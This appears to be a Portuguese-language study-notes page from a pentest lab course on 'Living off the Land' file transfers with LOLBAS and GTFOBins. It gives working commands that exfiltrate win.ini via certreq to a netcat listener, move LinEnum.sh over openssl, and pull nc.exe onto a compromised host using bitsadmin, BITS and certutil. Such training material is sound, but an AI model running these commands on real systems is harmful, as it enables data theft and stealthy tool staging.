LinkedinTryHackme

Living off The Land

Usando o Projeto LOLBAS e GTFOBins

  • LOLBAS

  • Para procurar funções de download e upload no LOLBAS podemos usar /downloadou /upload.

  • Carregue win.ini para nossa Pwnbox

certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini

  • Arquivo recebido em nossa sessão Netcat

sudo nc -lvnp 8000

  • GTFOBins

  • Crie um certificado em nossa Pwnbox

openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

  • Levante o servidor em nossa Pwnbox

openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

  • Baixar arquivo da máquina comprometida

openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh

Other Common Living off the Land tools

  • File Download with Bitsadmin

bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe

  • Download

Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"

  • Baixe um arquivo com Certutil

certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe
PreviousMiscellaneous File Transfer MethodsNextShells & Payloads

Last updated